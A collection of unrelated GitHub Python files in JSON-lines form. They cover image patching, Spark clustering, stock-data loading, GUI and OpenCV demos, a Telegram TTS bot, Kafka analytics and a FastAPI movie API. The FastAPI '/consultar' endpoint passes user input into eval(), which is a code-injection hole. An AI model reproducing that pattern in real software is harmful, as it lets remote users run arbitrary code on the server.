def grid_for_patches(imageshape, patchsize, slack):\n    # returns rows of (i0, j0, i1, j1) patch windows, clipped to the image borders\n    H,W = imageshape[:2]\n    stepsize = patchsize - slack\n    grid = np.stack( np.meshgrid( np.minimum( np.arange(patchsize, H+stepsize, stepsize), H ), \n                                  np.minimum( np.arange(patchsize, W+stepsize, stepsize), W ), indexing='ij' ), axis=-1 )\n    grid = np.concatenate([grid-patchsize, grid], axis=-1)\n    grid = np.maximum(0, grid)\n    return grid\n\ndef slice_into_patches_with_overlap(image, patchsize=1024, slack=32):\n    grid = grid_for_patches(image.shape, patchsize, slack)\n    patches = [image[i0:i1, j0:j1] for i0,j0,i1,j1 in grid.reshape(-1, 4)]\n    return patches\n\ndef stitch_overlapping_patches(patches, imageshape, slack=32, out=None):\n    patchsize = patches[0].shape[0]\n    grid = grid_for_patches(imageshape, patchsize, slack)\n    halfslack = slack//2\n    i0,i1 = (grid[grid.shape[0]-2,grid.shape[1]-2,(2,3)] - grid[-1,-1,(0,1)])//2\n    d0 = np.stack( np.meshgrid( [0]+[ halfslack]*(grid.shape[0]-2)+[ i0]*(grid.shape[0]>1),\n                                [0]+[ halfslack]*(grid.shape[1]-2)+[ i1]*(grid.shape[1]>1), indexing='ij' ), axis=-1 )\n    d1 = np.stack( np.meshgrid( [-halfslack]*(grid.shape[0]-1)+[imageshape[0]], \n                                [-halfslack]*(grid.shape[1]-1)+[imageshape[1]], indexing='ij' ), axis=-1 )\n    d = np.concatenate([d0,d1], axis=-1)\n    if out is None:\n        out = np.zeros(imageshape[:2]+patches[0].shape[2:], dtype=patches[0].dtype)\n    for patch,gi,di in zip(patches, d.reshape(-1,4), (grid+d).reshape(-1,4)):\n        out[di[0]:di[2], di[1]:di[3]] = patch[gi[0]:gi[2], gi[1]:gi[3]]\n    return out\n\n","repo_name":"ExPlEcoGreifswald/RootDetector","sub_path":"models_src/2022-07-11_029/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":5152,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"}
{"seq_id":"19880486623","text":"from pyspark.mllib.clustering import KMeans\nfrom pyspark import SparkContext\nimport dautil as dl\nimport csv\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nfrom 
matplotlib.colors import Normalize\n\n\ndef error(point, clusters):\n center = clusters.centers[clusters.predict(point)]\n\n return dl.stats.wssse(point, center)\n\nsc = SparkContext()\ncsv_file = dl.data.get_direct_marketing_csv()\nlines = sc.textFile(csv_file)\nheader = lines.first().split(',')\ncols_set = set(['recency', 'history', 'spend'])\nselect_cols = [i for i, col in enumerate(header) if col in cols_set]\n\nheader_rdd = lines.filter(lambda l: 'recency' in l)\nnoheader_rdd = lines.subtract(header_rdd)\ntemp = noheader_rdd.map(lambda v: list(csv.reader([v]))[0])\\\n .map(lambda p: (int(p[select_cols[0]]),\n dl.data.centify(p[select_cols[1]]),\n dl.data.centify(p[select_cols[2]])))\n\n# spend > 0\ntemp = temp.filter(lambda x: x[2] > 0)\n\npoints = []\nclusters = None\n\nfor i in range(2, 28):\n clusters = KMeans.train(temp, i, maxIterations=10,\n runs=10, initializationMode=\"random\")\n\n val = temp.map(lambda point: error(point, clusters))\\\n .reduce(lambda x, y: x + y)\n points.append((i, val))\n\n\ndl.options.mimic_seaborn()\nfig, [ax, ax2] = plt.subplots(2, 1)\nax.set_title('k-means Clusters')\nax.set_xlabel('Number of clusters')\nax.set_ylabel('WSSSE')\ndl.plotting.plot_points(ax, points)\n\ncollected = temp.collect()\nrecency, history, spend = zip(*collected)\nindices = [clusters.predict(c) for c in collected]\nax2.set_title('Clusters for spend, history and recency')\nax2.set_xlabel('history (cents)')\nax2.set_ylabel('spend (cents)')\nmarkers = dl.plotting.map_markers(indices)\ncolors = dl.plotting.sample_hex_cmap(name='hot', ncolors=len(set(recency)))\n\nfor h, s, r, m in zip(history, spend, recency, markers):\n ax2.scatter(h, s, s=20 + r, marker=m, c=colors[r-1])\n\ncma = mpl.colors.ListedColormap(colors, name='from_list', N=None)\nnorm = Normalize(min(recency), max(recency))\nmsm = mpl.cm.ScalarMappable(cmap=cma, norm=norm)\nmsm.set_array([])\nfig.colorbar(msm, label='Recency')\n\nfor i, center in enumerate(clusters.clusterCenters):\n recency, history, spend = center\n ax2.text(history, spend, str(i))\n\nplt.tight_layout()\nplt.show()\n","repo_name":"PacktPublishing/PythonDataAnalysisCookbook","sub_path":"Chapter 5/clustering_spark.py","file_name":"clustering_spark.py","file_ext":"py","file_size_in_byte":2315,"program_lang":"python","lang":"en","doc_type":"code","stars":120,"dataset":"github-code","pt":"51"} +{"seq_id":"5942415629","text":"import pickle\r\nfrom conf import db_conf2\r\nfrom sqlalchemy import create_engine\r\nimport pandas as pd\r\nfrom functools import reduce\r\nfrom sqlalchemy.exc import IntegrityError\r\n\r\nengine = create_engine(db_conf2)\r\n\r\ndata = engine.execute('select date_format(trade_date, \"%Y%m%d\"),date_id from trade_date;').fetchall()\r\ndate_dict = dict(data)\r\n\r\nwork_dirs = ['day_tick', 'daily_basic', 'adj_factor', 'money_flow']\r\nsuffix = '.pkl'\r\n\r\nfor date in date_dict.keys():\r\n print(f'processing data on {date}')\r\n df_list = []\r\n for i in work_dirs:\r\n with open(f'raw/{i}/{i}_{date}{suffix}', 'rb') as f:\r\n dd = pickle.load(f)\r\n df_list.append(dd)\r\n f.close()\r\n df_list[0].drop(['trade_date'], axis=1, inplace=True)\r\n df_list[1].drop(['trade_date', 'close'], axis=1, inplace=True)\r\n df_list[2].drop(['trade_date'], axis=1, inplace=True)\r\n df_list[3].drop(['trade_date'], axis=1, inplace=True)\r\n # for i in df_list:\r\n # print(i)\r\n\r\n df = reduce(lambda x, y: x.join(y.set_index('ts_code'), on='ts_code', how='left'), df_list)\r\n\r\n # df.to_sql('sz000001', con=engine, if_exists='append', index=False)\r\n\r\n 
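# Write each row into its per-ticker table; duplicate rows are skipped via\r\n    # the IntegrityError handling below.\r\n    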
for i in range(len(df)):\r\n s = df.iloc[i:i + 1, :]\r\n ts_code = s.iloc[0]['ts_code'].split('.')\r\n table_name = ts_code[1].lower() + ts_code[0]\r\n print(f'\\tprocessing {ts_code}')\r\n ddd = s[['open', 'high', 'low', 'close', 'pre_close', 'change',\r\n 'pct_chg', 'vol', 'amount', 'turnover_rate', 'turnover_rate_f',\r\n 'volume_ratio', 'pe', 'pe_ttm', 'pb', 'ps', 'ps_ttm', 'total_share',\r\n 'float_share', 'free_share', 'total_mv', 'circ_mv', 'adj_factor',\r\n 'buy_sm_vol', 'buy_sm_amount', 'sell_sm_vol', 'sell_sm_amount',\r\n 'buy_md_vol', 'buy_md_amount', 'sell_md_vol', 'sell_md_amount',\r\n 'buy_lg_vol', 'buy_lg_amount', 'sell_lg_vol', 'sell_lg_amount',\r\n 'buy_elg_vol', 'buy_elg_amount', 'sell_elg_vol', 'sell_elg_amount',\r\n 'net_mf_vol', 'net_mf_amount']]\r\n ddd['date_id'] = date_dict[date]\r\n ddd['active'] = True\r\n try:\r\n ddd.to_sql(table_name, con=engine, if_exists='append', index=False)\r\n except Exception as e:\r\n if isinstance(e, IntegrityError):\r\n print(f'duplicate entry for {table_name} on {date}, ignored')\r\n else:\r\n print(e)\r\n break\r\n","repo_name":"Archie2k16/tsquant","sub_path":"tick_data/update_tick_data.py","file_name":"update_tick_data.py","file_ext":"py","file_size_in_byte":2472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"14065040178","text":"#!/usr/bin/env python3\n\"\"\"\nAuthor : Me \nDate : today\nPurpose: Rock the Casbah\n\"\"\"\n\nimport argparse\n\n\n# --------------------------------------------------\ndef get_args():\n \"\"\"Get command-line arguments\"\"\"\n\n parser = argparse.ArgumentParser(\n description='Rock the Casbah',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument('positional',\n metavar='str',\n help='A positional argument')\n\n parser.add_argument('-a',\n '--arg',\n help='A named string argument',\n metavar='str',\n type=str,\n default='')\n\n parser.add_argument('-i',\n '--int',\n help='A named integer argument',\n metavar='int',\n type=int,\n default=0)\n\n parser.add_argument('-f',\n '--file',\n help='A readable file',\n metavar='FILE',\n type=argparse.FileType('r'),\n default=None)\n\n parser.add_argument('-o',\n '--on',\n help='A boolean flag',\n action='store_true')\n\n return parser.parse_args()\n\n\n# --------------------------------------------------\ndef main():\n \"\"\"Make a jazz noise here\"\"\"\n\n args = get_args()\n str_arg = args.arg\n int_arg = args.int\n file_arg = args.file\n flag_arg = args.on\n pos_arg = args.positional\n\n print(f'str_arg = \"{str_arg}\"')\n print(f'int_arg = \"{int_arg}\"')\n print('file_arg = \"{}\"'.format(file_arg.name if file_arg else ''))\n print(f'flag_arg = \"{flag_arg}\"')\n print(f'positional = \"{pos_arg}\"')\n\n\n# --------------------------------------------------\nif __name__ == '__main__':\n main()\n","repo_name":"kyclark/tiny_python_projects","sub_path":"template/template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","stars":1267,"dataset":"github-code","pt":"51"} +{"seq_id":"71839969757","text":"from PySide6.QtWidgets import QApplication, QWidget, QPushButton, QHBoxLayout, QVBoxLayout,\\\n QDialog, QFormLayout, QLineEdit, QDialogButtonBox, QMessageBox, QSpinBox\nfrom PySide6.QtCore import Qt\nimport sys\n\n\n# https://doc.qt.io/qtforpython/PySide6/QtWidgets/QDialog.html\nclass CustomDialog(QDialog):\n def __init__(self, parent=None, title='', name='', age=0):\n super().__init__(parent)\n\n # 
Resize window\n        self.setMinimumWidth(300)\n        self.setWindowTitle(title)\n\n        # Create name text box\n        self.txt_name = QLineEdit(name)\n        self.txt_name.setMaxLength(20)\n\n        # Create age spinbox\n        self.spin_age = QSpinBox()\n        self.spin_age.setMinimum(0)\n        self.spin_age.setMaximum(100)\n        self.spin_age.setValue(age)\n\n        # Add text boxes to form layout\n        self.form = QFormLayout()\n        self.form.addRow('Name: ', self.txt_name)\n        self.form.addRow('Age:', self.spin_age)\n\n        # Create dialog Ok and Cancel buttons\n        dialog_buttons = QDialogButtonBox(QDialogButtonBox.StandardButton.Ok |\n                                          QDialogButtonBox.StandardButton.Cancel)\n        dialog_buttons.accepted.connect(self.accept)\n        dialog_buttons.rejected.connect(self.reject)\n\n        # Add form and dialog buttons to vertical box layout\n        vbox = QVBoxLayout()\n        vbox.addLayout(self.form)\n        vbox.addWidget(dialog_buttons)\n\n        # Add vertical layout to window\n        self.setLayout(vbox)\n\n    def get_name(self):\n        # Return text from textbox\n        return self.txt_name.text()\n\n    def get_age(self):\n        # Return age from spinbox\n        return self.spin_age.value()\n\n\nclass MainWindow(QWidget):\n    def __init__(self):\n        super().__init__()\n\n        self.custom_dialog_modeless = None\n        self.name = ''\n        self.age = 0\n\n        # Set minimum window size\n        self.setMinimumSize(150, 100)\n        self.setWindowTitle('Custom dialog')\n\n        # Add the customize hint, then remove the min/max buttons\n        self.setWindowFlags(self.windowFlags() | Qt.CustomizeWindowHint)\n        self.setWindowFlags(self.windowFlags() & ~Qt.WindowMinMaxButtonsHint)\n\n        # Create push buttons\n        show_dialog_model = QPushButton('Modal dialog', self)\n        show_dialog_model.clicked.connect(self.dialog_model_show)\n        show_dialog_model.setFixedWidth(130)\n        show_dialog_modeless = QPushButton('Modeless dialog', self)\n        show_dialog_modeless.clicked.connect(self.dialog_modeless_show)\n        show_dialog_modeless.setFixedWidth(130)\n\n        # Add buttons to window\n        hbox = QHBoxLayout()\n        hbox.addWidget(show_dialog_model)\n        hbox.addWidget(show_dialog_modeless)\n\n        # Create quit button\n        dialog_buttons = QDialogButtonBox(QDialogButtonBox.StandardButton.Ok)\n        dialog_buttons.button(QDialogButtonBox.StandardButton.Ok).setText('Quit')\n        dialog_buttons.accepted.connect(QApplication.quit)\n\n        # Add dialog-launcher buttons and quit button to layout\n        vbox = QVBoxLayout()\n        vbox.addLayout(hbox)\n        vbox.addWidget(dialog_buttons)\n\n        # Add layout to window\n        self.setLayout(vbox)\n\n    def dialog_model_show(self):\n        # Create custom modal dialog\n        custom_dialog_model = CustomDialog(parent=self,\n                                           title='Custom Modal Dialog',\n                                           name=self.name,\n                                           age=self.age)\n\n        # Wait until True (Ok / accepted) or False (Cancel / rejected) clicked\n        if custom_dialog_model.exec():\n            # Get results from dialog\n            self.name = custom_dialog_model.get_name()\n            self.age = custom_dialog_model.get_age()\n            self.show_results(name=self.name, age=self.age)\n\n    def dialog_modeless_show(self):\n        # Create custom modeless dialog\n        if not self.custom_dialog_modeless:\n            self.custom_dialog_modeless = CustomDialog(parent=self,\n                                                       title='Custom Modeless Dialog',\n                                                       name=self.name,\n                                                       age=self.age)\n            self.custom_dialog_modeless.accepted.connect(self.dialog_modeless_close)\n            self.custom_dialog_modeless.rejected.connect(self.dialog_modeless_reject)\n\n        # Show modeless dialog (show() returns immediately)\n        self.custom_dialog_modeless.show()\n\n    def dialog_modeless_close(self):\n        # Get results from dialog\n        self.name = self.custom_dialog_modeless.get_name()\n        self.age = self.custom_dialog_modeless.get_age()\n        self.show_results(name=self.name, age=self.age)\n\n        # Destroy object\n        self.custom_dialog_modeless = None\n\n
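    # Note: the modeless dialog is kept as an attribute so it is not garbage\n    # collected while open; the close/reject handlers reset it to None so a\n    # fresh dialog is created next time.\n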
    def dialog_modeless_reject(self):\n        # Destroy object\n        self.custom_dialog_modeless = None\n\n    def show_results(self, name, age):\n        # Show results in information message box\n        QMessageBox.information(self,\n                                'Result',\n                                \"Hi {}! \\nYou are {} years old.\".format(name, age),\n                                QMessageBox.StandardButton.Ok)\n\n\ndef main():\n    app = QApplication(sys.argv)\n    main_window = MainWindow()\n    main_window.show()\n    sys.exit(app.exec())\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"Erriez/pyside6-getting-started","sub_path":"06_dialogs/05_custom_dialog.py","file_name":"05_custom_dialog.py","file_ext":"py","file_size_in_byte":5375,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"51"}
{"seq_id":"70433619038","text":"from telegram import Update\nfrom telegram.ext import Updater, CommandHandler, CallbackContext, MessageHandler\nfrom gtts import gTTS\nimport os\n\n\nlanguage = 'en'\ndef tts(update: Update, context: CallbackContext) -> None:\n    context.bot.send_chat_action(update.effective_chat.id, \"record_audio\")\n    # strip the command prefix (e.g. \"/tts\") from the message text\n    tts = update.message.text.replace(update.message.text.split(' ')[0], '')\n    myobj = gTTS(text=tts, lang=language, slow=False)\n    file_id = str(update.message.from_user.id) + '.mp3'\n    myobj.save(file_id)\n    context.bot.sendAudio(chat_id=update.message.chat.id, audio=open(file_id, 'rb'), title='Vippy TTS')\n    os.remove(file_id)\n\n__handlers__ = [\n    [\n        CommandHandler(\n            \"tts\",\n            tts\n        )\n    ]\n]\n","repo_name":"ArmTimDev/Vippy","sub_path":"handlers/tts.py","file_name":"tts.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"}
{"seq_id":"12685933709","text":"import json\nfrom os.path import exists, join\nfrom urllib.request import urlopen\nimport time\n\n\ndownload_folder = 'zips'\n\nwith open('json_data.json') as json_file:\n    mapping = json.load(json_file)\n    for book in mapping:\n        if exists(join(download_folder, book)):\n            print(f\"{book} already downloaded.\")\n        else:\n            print(f\"{book} missing, downloading.\")\n            data = mapping[book]\n            work = data['url'].replace('http://runeberg.org/','').strip('/')\n            with urlopen( f\"http://runeberg.org/download.pl?mode=txtzip&work={work}\" ) as webpage:\n                content = webpage.read()\n\n            with open( join(download_folder,book), 'wb' ) as download:\n                download.write( content )\n            time.sleep(10)","repo_name":"moonhouse/vad","sub_path":"download_zips.py","file_name":"download_zips.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
{"seq_id":"4118272833","text":"import numpy as np\nimport cv2 as cv\n\n'''\nOpening and closing operations\n\nOpening\nOne of the key operations in image morphology, built by combining dilation and erosion.\nMainly used in binary image analysis; grayscale images work as well.\nOpening = erosion followed by dilation, applied to an input image with a structuring element.\n\nClosing\nAlso a key operation in image morphology, likewise built from dilation and erosion.\nMainly used in binary image analysis; grayscale images work as well.\nClosing = dilation followed by erosion, applied to an input image with a structuring element.\n\nAt the code level, what matters is the choice of the structuring element and the tuning of its size.\n'''\n\ndef open_demo(image):\n    print(image.shape)\n    gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)\n    ret, binary = cv.threshold(gray, 0, 255, cv.THRESH_BINARY_INV | cv.THRESH_OTSU)\n    cv.imshow('binary1 demo', binary)\n\n    kernel = cv.getStructuringElement(cv.MORPH_RECT, (15, 1))\n    binary = cv.morphologyEx(binary, cv.MORPH_OPEN, kernel)\n    cv.imshow('open results', binary)\n\ndef close_demo(image):\n    print(image.shape)\n    gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)\n    ret, binary = cv.threshold(gray, 0, 255, cv.THRESH_BINARY | cv.THRESH_OTSU)\n    cv.imshow('binary2 demo', binary)\n\n    kernel = cv.getStructuringElement(cv.MORPH_RECT, (1, 15))\n    binary = cv.morphologyEx(binary, cv.MORPH_CLOSE, kernel)\n    cv.imshow('close results', binary)\n\n\n
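# Editorial note on structuring elements (example values, not from the original\n# file): a (15, 1) MORPH_RECT kernel preserves horizontal structures, (1, 15)\n# preserves vertical ones, and e.g. cv.getStructuringElement(cv.MORPH_ELLIPSE, (5, 5))\n# treats both directions evenly.\n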
print('----------Hello Python----------')\nsrc = cv.imread('./figure/morph01.png')\ncv.namedWindow('input image', cv.WINDOW_AUTOSIZE)\ncv.imshow('input image', src)\n\nopen_demo(src)\n\n#close_demo(src)\ncv.waitKey(0)\ncv.destroyAllWindows()\n\n","repo_name":"xm0629/python3-opencv","sub_path":"26-开闭操作.py","file_name":"26-开闭操作.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"}
{"seq_id":"3923890744","text":"import sys\nimport json\nfrom common.kafka_pipeline import KafkaPipeline\nfrom applications.basic_analytics.stb_analytics.top_processes.stb_processor import StbProcessor\nfrom util.utils import Utils\nfrom pyspark.sql.functions import col, collect_list, udf, split, explode, struct\nfrom pyspark.sql.types import ArrayType, StringType, DoubleType, BooleanType, StructField, StructType\n\nclass TopProcesses(StbProcessor):\n    \"\"\"\n    https://www.wikitechy.com/tutorials/linux/how-to-calculate-the-cpu-usage-of-a-process-by-pid-in-Linux-from-c\n    \"\"\"\n\n    def __init__(self, configuration, schema):\n\n        self.__configuration = configuration\n        self._schema = schema\n        self._component_name = configuration.property(\"analytics.componentName\")\n        self.kafka_output = configuration.property(\"kafka.topics.output\")\n\n    def _calculate_mem_usage(self, stream):\n        \"\"\"\n        Add a proc_mem_usage column: per-process RSS as a percentage of total\n        memory, rounded to four decimal places.\n        :param stream: dataframe holding MemoryUsage_totalKb and proc_rss columns\n        :return: dataframe with proc_mem_usage added and numeric process columns\n        \"\"\"\n        def udf_mem_usage(row):\n            # row is a struct of all columns; the indices follow the column order of the incoming dataframe\n            MemoryUsage_totalKb = row[7]\n            proc_rss = row[10]\n\n            proc_mem_usage = round((float(proc_rss) / float(MemoryUsage_totalKb)) * 1000000) / 10000.0\n\n            return proc_mem_usage\n\n        add_mem_usage = udf(lambda row: udf_mem_usage(row), DoubleType())\n        mem_usage = stream \\\n            .withColumn(\"proc_mem_usage\", add_mem_usage(struct([stream[x] for x in stream.columns]))) \\\n            .drop('MemoryUsage_freeKb') \\\n            .withColumn(\"proc_rss\", col(\"proc_rss\").cast(DoubleType())) \\\n            .withColumn(\"proc_utime\", col(\"proc_utime\").cast(DoubleType())) \\\n            .withColumn(\"proc_stime\", col(\"proc_stime\").cast(DoubleType()))\n\n        return mem_usage\n\n    def _seperate_procs(self, stream):\n        \"\"\"\n        Separate the top_procs field into one row per process.\n        :param stream: dataframe with the raw TopProcesses_processes JSON string\n        :return: dataframe with per-process columns and memory usage added\n        \"\"\"\n        def udf_split_procs(text):\n            arr = text.replace('},{', '}|{').split('|')\n            req_fields = ['ts', 'name', 'rss', 'utime', 'stime']\n            res = []\n            for elem in arr:\n                proc = json.loads(elem)\n                row = []\n                for key in req_fields:\n                    row.append(proc[key])\n                res.append(row)\n            return res\n\n        split_proc = udf(lambda row: udf_split_procs(row), ArrayType(ArrayType(StringType())))\n        flatten = stream \\\n            .withColumn(\"TopProcesses_processes\", split_proc(col('TopProcesses_processes'))) \\\n            .withColumn('TopProcesses_processes', explode('TopProcesses_processes')) \\\n            .withColumn('proc_ts', col('TopProcesses_processes').getItem(0)) \\\n            .withColumn('proc_name', col('TopProcesses_processes').getItem(1)) \\\n            .withColumn('proc_rss', col('TopProcesses_processes').getItem(2)) \\\n            .withColumn('proc_utime', col('TopProcesses_processes').getItem(3)) \\\n            .withColumn('proc_stime', col('TopProcesses_processes').getItem(4)) \\\n            .drop('TopProcesses_processes')\n\n        mem_usage = self._calculate_mem_usage(flatten)\n        return mem_usage\n\n    def _process_pipeline(self, stream):\n        \"\"\"\n        Pipeline method\n        :param stream: kafka stream reader\n        :return: list of streams\n        \"\"\"\n
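        # `udf_filter` and `_fill_df` are not defined in this file; they are\n        # expected to come from the parent StbProcessor. A minimal stand-in for\n        # local testing could be (assumption, not the original implementation):\n        #     @staticmethod\n        #     def udf_filter(procs):\n        #         return procs is not None and len(procs) > 0\n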
        filter_udf = udf(TopProcesses.udf_filter, BooleanType())\n        processed = stream \\\n            .groupBy('originId') \\\n            .agg(collect_list('timestamp'), collect_list('MemoryUsage_freeKb'), collect_list('MemoryUsage_totalKb'),\n                 collect_list('TopProcesses_processes'), collect_list('hardwareVersion'), collect_list('modelDescription'),\n                 collect_list('firmwareVersion'), collect_list('appVersion')) \\\n            .filter(filter_udf(col('collect_list(TopProcesses_processes)')))\n\n        filled = self._fill_df(processed)\n        proc_split = self._seperate_procs(filled)\n        return [proc_split]\n\n    @staticmethod\n    def get_message_schema():\n        return StructType([\n            StructField(\"timestamp\", StringType()),\n            StructField(\"originId\", StringType()),\n            StructField(\"MemoryUsage_freeKb\", StringType()),\n            StructField(\"MemoryUsage_totalKb\", StringType()),\n            StructField(\"TopProcesses_processes\", StringType()),\n            StructField(\"hardwareVersion\", StringType()),\n            StructField(\"modelDescription\", StringType()),\n            StructField(\"firmwareVersion\", StringType()),\n            StructField(\"appVersion\", StringType())\n        ])\n\ndef create_processor(configuration):\n    return TopProcesses(configuration, TopProcesses.get_message_schema())\n\n\nif __name__ == \"__main__\":\n    configuration = Utils.load_config(sys.argv[:])\n    KafkaPipeline(\n        configuration,\n        create_processor(configuration)\n    ).start()\n","repo_name":"MichalKus/odh-python-pipelines","sub_path":"src/applications/basic_analytics/stb_analytics/top_processes/driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":4789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
{"seq_id":"22073393372","text":"\"\"\"When an alien hits the player's ship, several tasks have to run:\n1. Remove the remaining aliens and bullets\n2. Re-center the ship\n3. Create a new fleet of aliens\n\"\"\"\nclass GameStats:\n    # Tracks statistics such as how many times the ship has been hit\n    def __init__(self,ai_game):\n        self.settings = ai_game.settings\n        self.reset_stats() # initialize most of the statistics\n        self.game_active = False # flag: is the game running\n        self.high_score = 0 # initial high score\n    def reset_stats(self):\n        # Initialize the statistics that can change during the game\n        self.ship_left = self.settings.ship_limit # number of ships left\n        self.score = 0 # current score\n        self.level = 1 # starting player level\n\n","repo_name":"xiao205/Battle_of-_Ships","sub_path":"bit_ship/game_stats.py","file_name":"game_stats.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
{"seq_id":"40317293600","text":"import pandas as pd\n# Project's own ML helpers\nfrom ml_models import matriz_similitud, obtener_recomendaciones\n# Libraries needed for the landing page and the API\nfrom fastapi import FastAPI, Form, Request\nfrom enum import Enum\nfrom fastapi.responses import HTMLResponse\nfrom fastapi.templating import Jinja2Templates\n\ntemplates = Jinja2Templates(directory=\"templates\")\n\n# GENERAL API METADATA\napp = FastAPI()\napp.title = \"Movies API - ML MoviesRecommenderSystem\"\napp.version = \"1.0.0\"\n\n# Needed for the logos\nfrom fastapi.staticfiles import StaticFiles\napp.mount(\"/static\", StaticFiles(directory=\"static\"), name=\"static\")\n\n# INITIAL VIEW: LANDING PAGE WITH EXAMPLE CASES\n@app.get(\"/\", response_class=HTMLResponse)\nasync def mostrar_portada(request: Request):\n    funciones = [\n        {\"nombre\": \"PELICULAS POR MES\", \"parametro_predeterminado\": \"enero\"},\n        {\"nombre\": \"PELICULAS POR DIA\", \"parametro_predeterminado\": \"lunes\"},\n        {\"nombre\": \"POPULARIDAD DEL TITULO\", \"parametro_predeterminado\": \"Toy Story\"},\n        {\"nombre\": \"VOTOS DEL TITULO\", \"parametro_predeterminado\": \"Jumanji\"},\n        {\"nombre\": \"INFORMACION DE ACTOR\", \"parametro_predeterminado\": \"Tom Hanks\"},\n        {\"nombre\": \"INFORMACION DE DIRECTOR\", \"parametro_predeterminado\": \"John Lasseter\"},\n        {\"nombre\": \"SISTEMA DE RECOMENDACION\", \"parametro_predeterminado\": \"Jumanji\"},\n    ]\n    return templates.TemplateResponse(\"index.html\", {\"funciones\": funciones, \"request\": request})\n\ndicFunc = {\"PELICULAS POR MES\": \"cantidad_filmaciones_mes\",\n           \"PELICULAS POR DIA\": \"cantidad_filmaciones_dia\",\n           \"POPULARIDAD DEL TITULO\": \"score_titulo\",\n           \"VOTOS DEL TITULO\":\"votos_titulo\",\n           \"INFORMACION DE ACTOR\":\"get_actor\",\n           \"INFORMACION DE DIRECTOR\":\"get_director\",\n           \"SISTEMA DE RECOMENDACION\":\"get_recomendacion\"}\n\n
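# Editorial note: the handler below eval()s a string built from request input,\n# which is risky. Since dicFunc already names the target coroutines, a safer\n# dispatch (an alternative sketch, not the original code) would be:\n#     handler = globals()[funcion]\n#     resultado = await handler(parametro)\n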
\"INFORMACION DE DIRECTOR\", \"parametro_predeterminado\": \"John Lasseter\"},\n {\"nombre\": \"SISTEMA DE RECOMENDACION\", \"parametro_predeterminado\": \"Jumanji\"},\n ]\n return templates.TemplateResponse(\"index.html\", {\"funciones\": funciones, \"request\": request})\n\ndicFunc = {\"PELICULAS POR MES\": \"cantidad_filmaciones_mes\",\n \"PELICULAS POR DIA\": \"cantidad_filmaciones_dia\",\n \"POPULARIDAD DEL TITULO\": \"score_titulo\",\n \"VOTOS DEL TITULO\":\"votos_titulo\",\n \"INFORMACION DE ACTOR\":\"get_actor\",\n \"INFORMACION DE DIRECTOR\":\"get_director\",\n \"SISTEMA DE RECOMENDACION\":\"get_recomendacion\"}\n\n@app.post(\"/consultar\")\nasync def consultar(request: Request, funcion: str = Form(...), parametro: str = Form(...)):\n funcion = dicFunc[funcion]\n if funcion in dicFunc.values():\n try:\n parametro = parametro.lower()\n resultado = await eval(f\"{funcion}('{parametro}')\")\n return resultado\n except Exception as e:\n return {\"Error\": str(e), \"Type\": \"Entrada incorrecta o desconocida, vea /docs para mas detalles\"}\n else:\n return {\"error\": \"Función no válida\"}\n\n#INICIO DE LA API\n@app.on_event(\"startup\")\nasync def startup_event():\n # CARGANDO LOS ARCHIVOS NECESARIOS PARA LOS ENDPOINTS\n global df\n global df2\n global df3\n df = pd.read_csv('data/cleanMovies.csv', parse_dates = ['release_date'])\n df2 = pd.read_csv('data/cleanCredits.csv')\n df3 = pd.merge(df, df2, on='id', how='inner')\n # Casteo de datos a tipo lista para posterior manipulacion\n df3['cast'] = df3['cast'].apply(lambda x: eval(x) if pd.notnull(x) else list([]))\n df3['director'] = df3['director'].apply(lambda x: eval(x) if pd.notnull(x) else list([]))\n\n #ENTRADA REDUCIDA PARA EL SISTEMA DE ML\n global entrada_ml\n entrada_ml = df[0:5000][['title', 'genres', 'overview']]\n entrada_ml.reset_index\n global similitudes\n similitudes = matriz_similitud(entrada_ml)\n\n#Endpoint 1\nclass Mes(str, Enum):\n enero = \"enero\"\n febero = \"febrero\"\n marzo = \"marzo\"\n abril = \"abril\"\n mayo = \"mayo\"\n junio = \"junio\"\n julio = \"julio\"\n agosto = \"agosto\"\n septiembre = \"septiembre\"\n octubre = \"octubre\"\n noviembre = \"noviembre\"\n diciembre = \"diciembre\"\n\nmeses = {\n \"enero\": 1,\n \"febrero\": 2,\n \"marzo\": 3,\n \"abril\": 4,\n \"mayo\": 5,\n \"junio\": 6,\n \"julio\": 7,\n \"agosto\": 8,\n \"septiembre\": 9,\n \"octubre\": 10,\n \"noviembre\": 11,\n \"diciembre\": 12\n}\n\n@app.get(\"/peliculas/get_month/{mes}\", tags=['Peliculas'])\nasync def cantidad_filmaciones_mes( mes: Mes ):\n \"\"\"\n Cantidad de filmaciones estrenadas el mes indicado.\n\n Esta función recibe un mes en idioma español y retorna el número de peliculas estrenadas dicho mes sin importar cual es el año.\n\n Parametros\n ----------\n mes : str\n\n mes en idioma español enero,febrero,marzo,...\n\n Retorno\n -------\n JSON:\n\n {\"mes\":mes, \"peliculas\": int(salida) }\n \n Ejemplo\n --------\n >>> cantidad_filmaciones_mes(febrero)\n\n { \"mes\": \"enero\", \"peliculas\": 5909 }\n \"\"\"\n mesNum = meses[mes]\n salida = df[df['release_date'].dt.month == mesNum].release_date.count()\n return {\"mes\":mes, \"peliculas\": int(salida) }\n\n#Endpoint 2\nclass Dia(str, Enum):\n lunes = 'lunes'\n martes = 'martes'\n miercoles = 'miércoles'\n jueves = 'jueves'\n viernes = 'viernes'\n sabado = 'sábado'\n domingo = 'domingo'\n\ndias = {\n 'lunes': 